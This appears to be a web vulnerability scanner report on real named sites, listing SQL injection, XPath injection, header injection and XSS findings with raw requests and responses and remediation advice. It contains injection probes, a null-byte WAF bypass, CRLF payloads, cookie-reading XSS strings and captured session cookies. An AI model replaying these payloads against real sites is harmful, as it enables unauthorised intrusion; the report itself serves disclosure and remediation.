SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The ltcid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ltcid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /g.lt?nvst=12596&nvtt=z&nvup=1&nvgpflid=547362597 HTTP/1.1 Host: lt.navegg.com Proxy-Connection: keep-alive Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E21b58676d82=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ltcid=547362597'
Response 1
HTTP/1.1 500 Internal Server Error P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR' Content-Type: text/html Content-Length: 369 Date: Wed, 19 Jan 2011 18:01:20 GMT Server: lighttpd/1.4.19
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
Request 2
GET /g.lt?nvst=12596&nvtt=z&nvup=1&nvgpflid=547362597 HTTP/1.1 Host: lt.navegg.com Proxy-Connection: keep-alive Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E21b58676d82=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ltcid=547362597''
Response 2
HTTP/1.1 200 OK P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR' Set-Cookie: inf= ; path=/; domain=.navegg.com; expires=Wed, 20-Jan-2011 06:01:21 GMT Content-type: application/javascript Date: Wed, 19 Jan 2011 18:01:21 GMT Server: lighttpd/1.4.19 Content-Length: 45
The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /sc.lt?id=' HTTP/1.1 Host: navegg.boo-box.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR' Content-Type: text/html Content-Length: 369 Date: Wed, 19 Jan 2011 18:09:52 GMT Server: lighttpd/1.4.19
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
Request 2
GET /sc.lt?id='' HTTP/1.1 Host: navegg.boo-box.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR' Set-Cookie: inf=''_0_0_0_0_0_0_0-0-0-0-0; path=/; domain=.boo-box.com; expires=Wed, 19-Jan-2012 12:09:52 GMT Content-type: application/javascript Date: Wed, 19 Jan 2011 18:09:52 GMT Server: lighttpd/1.4.19 Content-Length: 23
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /image/special2.jpg HTTP/1.1 Host: v6test.cdn.att.net Proxy-Connection: keep-alive Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/Attorneys Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00' Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found Date: Wed, 19 Jan 2011 16:50:03 GMT Last-Modified: Wed, 19 Jan 2011 16:50:03 GMT Server: Sun-ONE-Web-Server/6.1 Content-Length: 5532 Content-Type: text/html X-Cache: MISS from 12.120.38.41 Age: 35 X-Cache: HIT from 12.120.79.21 Via: 1.1 12.120.38.41:80 (cache/2.6.2.2.16.ATT), 1.1 12.120.79.21:80 (cache/2.6.2.2.16.ATT) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>AT&a ...[SNIP]... <strong>http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/Attorneys</strong> ...[SNIP]...
Request 2
GET /image/special2.jpg HTTP/1.1 Host: v6test.cdn.att.net Proxy-Connection: keep-alive Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/Attorneys Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'' Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found Date: Wed, 19 Jan 2011 16:49:53 GMT Last-Modified: Wed, 19 Jan 2011 16:49:53 GMT Server: Sun-ONE-Web-Server/6.1 Content-Length: 5422 Content-Type: text/html X-Cache: HIT from 12.120.38.42 Age: 45 X-Cache: HIT from 12.120.79.20 Via: 1.1 12.120.38.42:80 (cache/2.6.2.2.16.ATT), 1.1 12.120.79.20:80 (cache/2.6.2.2.16.ATT) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>AT&a ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /showoffice.aspx HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close
Response 1 (redirected)
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:48:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=og0sit55134r4kyfq5mdkl3n; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 25
500 Internal Server Error
Request 2
GET /showoffice.aspx HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close
Response 2 (redirected)
HTTP/1.1 404 Not Found Connection: close Date: Wed, 19 Jan 2011 15:48:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=cjknstzb1jhxzoedkedo5kji; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 56279
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]...
The FUSEACTION parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the FUSEACTION parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?FUSEACTION=home.299'&pf=y HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:48:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
The article_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the article_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=news.detail&article_id=9405'&site_id=286 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:49:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
The emp_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the emp_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=attorneys.detail&site_id=299&emp_id=377' HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:49:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
The eventID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the eventID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=seminars.detail&eventID=5575'&site_id=492 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:51:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
The fuseaction parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the fuseaction parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=home.285' HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:49:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
The site_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the site_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=news.site&site_id=299' HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:49:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.
Issue remediation
User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application appears to be using the ASP.NET XPath APIs.
Request
GET /FCWSite'/Img HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<html> <head> <title>This is an unclosed string.</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family ...[SNIP]... </b>System.Xml.XPath.XPathException: This is an unclosed string.<br> ...[SNIP]... <pre>
[XPathException: This is an unclosed string.] MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289 MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503 MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application appears to be using the ASP.NET XPath APIs.
Request
GET /FCWSite/Img' HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<html> <head> <title>This is an unclosed string.</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family ...[SNIP]... </b>System.Xml.XPath.XPathException: This is an unclosed string.<br> ...[SNIP]... <pre>
[XPathException: This is an unclosed string.] MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289 MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503 MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705 MS.Internal.Xml.XPath. ...[SNIP]...
3. HTTP header injectionpreviousnext There are 3 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 2 is copied into the Location response header. The payload acc91%0d%0af14ecc46de1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /files/acc91%0d%0af14ecc46de1 HTTP/1.1 Host: accuserve.homestead.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/5.0 Date: Wed, 19 Jan 2011 15:20:44 GMT Location: /files/acc91 f14ecc46de1/
The value of the $ request parameter is copied into the Set-Cookie response header. The payload 99487%0d%0a1735d591256 was submitted in the $ parameter. This caused a response containing an injected HTTP header.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=99487%0d%0a1735d591256&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:99487 1735d591256;expires=Thu, 20 Jan 2011 05: 00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:54 GMT;path=/;domain=.zedo.com; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=533 Expires: Wed, 19 Jan 2011 18:09:47 GMT Date: Wed, 19 Jan 2011 18:00:54 GMT Connection: close Content-Length: 2018
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',99487 1735 ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload fab80%0d%0a7b239144ac4 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /deals/socialads_reflectorfab80%0d%0a7b239144ac4 HTTP/1.1 Host: livingsocial.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 19 Jan 2011 18:10:17 GMT Content-Type: text/html Content-Length: 178 Connection: close Location: http://partners.livingsocial.com/deals/socialads_reflectorfab80 7b239144ac4
<html> <head><title>301 Moved Permanently</title></head> <body bgcolor="white"> <center><h1>301 Moved Permanently</h1></center> <hr><center>nginx</center> </body> </html>
4. Cross-site scripting (reflected)previousnext There are 347 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
